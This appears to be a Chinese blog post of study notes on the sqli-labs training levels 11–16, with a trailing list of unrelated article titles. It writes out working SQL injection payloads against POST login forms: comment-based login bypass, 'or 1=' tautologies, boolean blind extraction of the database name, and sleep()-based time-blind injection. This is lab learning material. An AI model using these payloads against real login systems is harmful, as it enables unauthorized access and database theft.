sqli-labs(less-11-16)
2024-10-18 13:50:09
POST登入
首先试试
uname=admin'# & passwd=1
登入成功
如果不知道用户名 ,注释符被过滤,可以从password入手
一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的
uname=test & passwd='or 1='
接下来利用盲注猜解数据库(布尔盲注)
uname=test & passwd='or length(database())>0 or 1=' //#被过滤情况下
uname=test & passwd='or length(database())>0 #
剩下的步骤和get一样
一个个猜解数据库的名字
uname=test & passwd='or ascii(substr((select database()),1,1))>0 or 1='
less-12
uname=test & passwd='or 1='
先猜解是被单引号包围还是双引号还是括号什么的
uname=test & passwd=" #
爆语法错误了,语句没写好QAQ
uname=test' # & passwd=1
uname=test" # & passwd=1
之前搞错了 ,不存在test这个用户所以当然不了
uname=admin‘ # & passwd= uname=admin" # & passwd=1 uname=admin‘) # & passwd= uname=admin") # & passwd=1 //成功登入
uname=test & passwd= or =' uname=test & passwd= or =" uname=test & passwd= or =(' uname=test & passwd= or =("1 //按理说这个应该可以 都登不进去
原来是passwd那个没有用")闭合
uname=test & passwd=") or 1=("
爆数据库
uname=test & passwd=") or length(database())>0 or 2=("
接下来的步骤和之前一样
less-13
uname=admin' # & passwd=1 uname=admin") # & passwd=1 ') " 都报错了
看源码是‘)闭合的鸭 怎么就不行呢
原来如此 ,登入了也不返回结果
注意一下 ,成功了会返回图片
less-13
uname=admin" # & passwd=1
less-14
尝试sleep()时间盲注
uname=admin" and sleep(10) # & passwd=1 uname=admin" or sleep(10) # & passwd=1
延迟了,发现可以sleep盲注,当用or 的时候是一直在转 不知道为什么
uname=admin" # & passwd=1
less-15
'
uname=admin") # & passwd=1
')
")
都报错了,不过输入单引号没有返回结果 // 窗口有点小 往下滑就了
uname=admin' & passwd=1
试一下永真
uname=a & passwd=' or 1='
less-16
uname=admin") #&passwd=a'
uname=admin") #&passwd=a'or length(database())>0 1=("
利用sleep()
uname=a&passwd=a") or if(length((select database()))=8,1,sleep(5)) #
最新文章
- [转]How to override HandleUnauthorizedRequest in ASP.NET Core
- VB6.0 为批量字体改名
- CentOS6编译安装PHP7+Nginx
- 使用百度UMeditor富文本编辑器,修改自定义图片上传,修改源码
- jq实现多banner效果图
- testNG中@Factory详解
- c++ string char* const char*
- c语言,string库函数itoa实现:将int转换为char*
- AIX缩小逻辑卷报错chfs: 0506-964
- 做的简单的一个静态web服务器,遇到个bug, 提示osError,这点一不小心就错了,特地记下来,加深记忆,socket须先绑定,再listen,如果是先listen再绑定,系统会自动分配一个端口,而程序绑定不了
- 一次断电后docker问题的排解
- Async分析
- Java基础--Java---IO流------GUI(布局)、Frame、事件监听机制、窗体事件、Action事件、鼠标事件、对话框Dialog、键盘事件、菜单
- java面试——多线程
- 提高MySQL数据库的安全性
- svg转png
- MySQL数据类型及使用场景
- Spring AOP介绍及源码分析
- 【BZOJ】1085 [SCOI2005]骑士精神(IDA*)
- com.mysql.jdbc.MysqlDataTruncation: Data truncation: Truncated incorrect DOUBLE value:...